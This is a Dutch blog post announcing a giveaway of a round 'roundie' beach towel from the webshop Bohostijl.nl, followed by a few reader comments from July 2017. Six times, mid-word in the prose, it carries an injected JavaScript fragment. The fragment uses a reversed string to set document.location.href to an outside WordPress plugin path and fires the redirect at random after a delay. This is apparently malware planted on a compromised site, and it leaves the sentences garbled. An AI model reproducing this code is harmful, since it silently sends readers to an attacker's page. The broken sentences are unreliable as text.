Overig

Ik heb laatst een roundie gewonnen en mag er ook eentje weggeven!

Een aantal weken geleden heb ik een hele mooie roundie gewonnen van de Ibiza Style webshop Bohostijl.nl. Als het mooi weer is ga ik meestal even liggen bij een plas vlakbij mijn huis. Ook al is het maar 1 of 2 uurtjes. Heerlijk even chillen in het zonnetje! En nu uiteraard steeds met mijn nieuwe roundie.

Roundie

Win een roundie van Bohostijl.nl

Zelf heb ik een witte roundie met veren gewonnen, zoals te zien is op de fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to hierboven. Superleuk! Toen ik hierover contact had en ze bij Bohostijl.nl hoorden wat voor blog ik heb, kwamen zij met het idee dat ik een roundie  weg zou mogen geven aan een volger. Dit omdat zij een wel heel toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasselijke in hun assortiment hebben.

Overigens hebben zij meerdere hele leuke, die toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevallig ook nog in de aanbieding zijn ook. Bekijk hier het hele assortiment roundies.

Ze hebben nog meer hele leuke dingen, dus het is de moeite waard om even rond te neuzen op de site. Ik heb zelf nog een paar oorbellen besteld daar.

Oorbellen

Wat ga ik weggeven dan….?

Zie de onderstaande afbeelding. Ik vind de tekst ook heel toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasselijk. De meeste van jullie hebben allemaal ongelooflijk veel shit meegemaakt, maar blijven toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch altijd maar positief en proberen er het beste van te maken.

Maar hoe win je? Laat weten in een reactie onder dit bericht waarom jij het verdiend hebt. Of waarom deze juist supergoed bij jou past.

Roundie winnen van Bohostijl.nl

Wanneer weet je of je gewonnen hebt?

Op 5 augustus zal ik de winnaar bekend maken via Facebook/Instagram. Delen van dit bericht is natuurlijk altijd leuk!

Facebook reacties

6 Reacties

 • Reply
  EliUshi
  24 juli 2017 at 16:59

  Ik vind niet dat ik hem meer verdien dan anderen, maar ik zou wel graag willen
  winnen.
  In de hoop hem eens te kunnen gebruiken, ben namelijk bedlegerig.

  • Reply
   Marleen
   25 juli 2017 at 15:07

   Hoi Eliushi, Leuk dat je mee doet! Liefs!

 • Reply
  Maaike van Dinter
  24 juli 2017 at 15:56

  Die is nice!

 • Reply
  Maaike van Dinter
  24 juli 2017 at 16:00

 • Reply
  Maaike van Dinter
  24 juli 2017 at 16:00

  Met die prachtige roundie erbij, Perfect zomers gevoel

 • Reply
  Fred Verdult
  25 juli 2017 at 04:34

  Geweldig, m’n lijfspreuk!!!

 • Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: